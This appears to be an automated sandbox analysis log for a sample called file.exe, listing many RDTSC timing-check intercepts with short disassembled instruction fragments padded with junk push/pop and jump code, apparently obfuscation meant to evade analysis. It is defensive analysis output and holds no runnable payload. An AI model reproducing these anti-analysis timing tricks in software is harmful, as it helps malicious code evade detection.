                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46FCD8 second address: 46FCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA1660h 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46FCED second address: 46FD29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60CAC692h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F5E60CAC686h 0x00000012 popad 0x00000013 jmp 00007F5E60CAC695h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FD29 second address: 46FD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FED7 second address: 46FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC692h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FEED second address: 46FEF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FEF3 second address: 46FF1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007F5E60CAC698h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F5E60CAC686h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FF1C second address: 46FF2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F5E60BA1656h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FF2A second address: 46FF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FF2E second address: 46FF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47044E second address: 47046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC692h 0x00000009 jmp 00007F5E60CAC68Bh 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47046F second address: 470473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705D5 second address: 4705DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705DC second address: 4705F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60BA1667h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705F8 second address: 47061D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F5E60CAC686h 0x0000000f jmp 00007F5E60CAC696h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470756 second address: 470768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470768 second address: 4707BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5E60CAC6A3h 0x0000000b popad 0x0000000c jne 00007F5E60CAC6C4h 0x00000012 jns 00007F5E60CAC692h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E60CAC68Fh 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A21 second address: 470A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A27 second address: 470A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A30 second address: 470A46 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60BA1660h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A46 second address: 470A71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E60CAC68Bh 0x00000013 pushad 0x00000014 jmp 00007F5E60CAC68Dh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A71 second address: 470A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A76 second address: 470A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC692h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A8C second address: 470A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446A51 second address: 446A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 471434 second address: 471454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E60BA1667h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 471454 second address: 47145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5E60CAC686h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47145E second address: 471462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475C75 second address: 475C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5E60CAC686h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475DD3 second address: 475E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Dh 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F5E60BA1668h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475E08 second address: 475E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475E1B second address: 475E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F5E60BA1656h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E60BA1668h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475E45 second address: 475E62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F5E60CAC686h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474CFA second address: 474D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5E60BA1656h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 437681 second address: 437688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DA0A second address: 47DA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E60BA165Eh 0x00000010 jmp 00007F5E60BA165Fh 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DD79 second address: 47DD93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DD93 second address: 47DD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DD99 second address: 47DD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF08 second address: 47DF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF0C second address: 47DF27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5E60CAC68Ch 0x0000000c jns 00007F5E60CAC686h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF27 second address: 47DF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DF2D second address: 47DF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E4B4 second address: 47E4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5E60BA166Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E4DA second address: 47E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E4E0 second address: 47E4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF23 second address: 47EF31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5E60CAC68Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF31 second address: 47EF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5E60BA1656h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF40 second address: 47EF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EF61 second address: 47EF65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F0E4 second address: 47F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F0EA second address: 47F114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E60BA1665h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F5E60BA165Ch 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F259 second address: 47F25F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F358 second address: 47F35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F35E second address: 47F379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5E60CAC692h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F459 second address: 47F45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F6DC second address: 47F701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E60CAC690h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 480119 second address: 480138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5E60BA165Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F5E60BA1656h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 480138 second address: 480142 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4802C0 second address: 4802C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4802C4 second address: 4802EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov si, 083Dh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481286 second address: 4812C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D2B19h], ecx 0x0000000e mov dword ptr [ebp+122D20D4h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F5E60BA1658h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov di, ax 0x00000033 push 00000000h 0x00000035 mov si, cx 0x00000038 xchg eax, ebx 0x00000039 push edi 0x0000003a push eax 0x0000003b push edx 0x0000003c push edi 0x0000003d pop edi 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482CD9 second address: 482CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5E60CAC686h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4837AB second address: 4837B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5E60BA1656h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4837B5 second address: 4837C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F5E60CAC686h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4837C8 second address: 4837CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 432579 second address: 43257D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48797A second address: 48799A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E60BA1668h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48799A second address: 48799E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4883B8 second address: 4883C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5E60BA1656h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488168 second address: 48818E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F5E60CAC68Ch 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C8D5 second address: 48C8DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D8D9 second address: 48D960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60CAC699h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F5E60CAC688h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a jnp 00007F5E60CAC68Ch 0x00000030 adc ebx, 32BDC50Ah 0x00000036 push 00000000h 0x00000038 je 00007F5E60CAC689h 0x0000003e movsx edi, bx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F5E60CAC688h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d xchg eax, esi 0x0000005e push ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E8CB second address: 48E8E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E8E6 second address: 48E8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E8EA second address: 48E8EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EA73 second address: 48EA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FA99 second address: 48FAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E60BA165Bh 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EA77 second address: 48EA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49090D second address: 490911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FAAE second address: 48FAB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EA7D second address: 48EA96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5E60BA1656h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jng 00007F5E60BA1660h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FB60 second address: 48FB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EB56 second address: 48EB6B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60BA1656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F5E60BA1664h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490AAE second address: 490AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FB64 second address: 48FB7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1666h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EB6B second address: 48EB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489360 second address: 48936A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E60BA165Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48936A second address: 48937B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F5E60CAC694h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48937B second address: 48937F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48937F second address: 4893AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D21AEh], ecx 0x0000000d sbb di, 6F5Bh 0x00000012 lea eax, dword ptr [ebp+1248E0E4h] 0x00000018 mov edx, dword ptr [ebp+122D1E37h] 0x0000001e push eax 0x0000001f je 00007F5E60CAC698h 0x00000025 push eax 0x00000026 push edx 0x00000027 ja 00007F5E60CAC686h 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4893AC second address: 4893B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489881 second address: 48988A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48995C second address: 489961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489961 second address: 48997E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5E60CAC686h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F5E60CAC68Ch 0x00000017 rdtsc
